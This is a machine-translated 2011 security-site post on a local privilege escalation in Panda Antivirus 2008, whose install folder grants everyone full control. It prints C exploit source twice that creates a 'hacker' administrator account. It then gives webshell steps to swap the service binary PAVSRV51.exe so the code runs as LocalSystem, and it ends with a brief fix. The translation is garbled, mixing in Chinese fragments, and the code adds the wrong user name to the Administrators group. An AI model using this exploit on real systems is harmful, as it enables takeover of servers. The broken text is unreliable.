Panda local to mention the right vulnerability-vulnerability warning-the black bar safety net

2011-02-18T00:00:00
ID MYHACK58:62201129218
Type myhack58
Reporter 佚名
Modified 2011-02-18T00:00:00

Description

This article will bring to you is a Panda local to mention the right vulnerability. I think this vulnerability might be for we provide the right help, it'll tell you in detail about, after all, the more an idea is not anything bad. Compile EXP First, look on the vulnerability description. Panda to insecure access permissions to install the system files, a local attacker could use this vulnerability to elevate his privileges to obtain a system of full control. In the installation Panda 2 0 0 8, The default installation folder“%ProgramFiles%\Panda Security\Panda Antivirus 2 0 0 8\”permissions set to“Everyone:Full Control”. Some services, 如PAVSRV51.EXE from this folder to the LocalSystem account to start, but not the service execution any protection. Unprivileged users can use their own file to replace a service executable program, with local system privileges to get full access, or access to other log on to the host any user permissions, including system administrator privileges. The original is a directory permission set of the reasons, is set to anyone can full access. Here's the full access means that you can perform, can write, can read. The vulnerability of EXP by the Windows under the C language, the specific code as follows.

view plainprint?

include <windows. h>

include <stdio. h>

INT main( VOID ) { CHAR szWinDir[ _MAX_PATH ]; CHAR szCmdLine[ _MAX_PATH ]; GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH ); printf("cnbird modified version of\n"); printf( "create a username for \"hacker\" password, \"hacker\"...\n" ); wsprintf( szCmdLine, "%s\\system32\\net.exe user hacker hacker /add", szWinDir ); system( szCmdLine ); printf( "is added user \"hacker\" to the local Administrators group...\n" ); wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir ); system( szCmdLine ); printf("add success...Good Luck..."); return 0; }

include <windows. h>

include <stdio. h>

INT main( VOID ) { CHAR szWinDir[ _MAX_PATH ]; CHAR szCmdLine[ _MAX_PATH ]; GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH ); printf("cnbird modified version of\n"); printf( "create a username for \"hacker\" password, \"hacker\"...\n" ); wsprintf( szCmdLine, "%s\\system32\\net.exe user hacker hacker /add", szWinDir ); system( szCmdLine ); printf( "is added user \"hacker\" to the local Administrators group...\n" ); wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir ); system( szCmdLine ); printf("add success...Good Luck..."); return 0; }

The source I made some changes in order to simple and easy to use. The above code is saved as pandalocalexp. c, and then open the VC++compiled, the compilation process will not say more. I compiled the program PAVSRV51. exe with provided below, all can be used directly. Here to sell one off sub, the 先 不 告诉 大家 为什么 要 把 名字 改成 PAVSRV51.exe the. Local EXP using the method From the top of the vulnerability Description, We have learned that this vulnerability is due to Panda to the directory set there is a problem, cause anyone can access, which means that we can replace the Panda in the main program. Well, here I am on the specific operation. Since this is a local mention the right vulnerability, it is assumed that we have made a website the WebShell on. Log in to WebShell, find the Panda's installation directory, here is “C:\Program Files\Panda Software\Panda Antivirus 2 0 0 8”we go into this directory, as shown in Figure 1.

!

Figure 1

The first step, putting our local vulnerabilities using program upload this folder inside, don't be afraid, this directory is for anyone to control, you are assured to pass it! As shown in Figure 2, 我先把这个程序改名为1.exe the. !

Figure 2 The second step, we put the Panda in the main program PAVSRV51. exe renamed PAVSRV51. old, click on the WebShell of the“move”command. The third step, the 把 我们 上传 的 1.exe 改名 字 为 PAVSRV51.exe the. Here the basic is done, after all we need is to wait for a server restart, load our exploit program will successfully add the user. Because I already have Server Permissions, it directly restart. View the user, ha ha, have successfully added a user to hacker and password hacker, as shown in Figure 3, or the system permissions.

!

Figure 3 Here I will not say more what, the rest of the things on to everyone their own. Finally, I say that vulnerability repair method is very simple, as long as the Panda's installation directory permission is set low, does not allow ordinary users have execute the command permissions on it.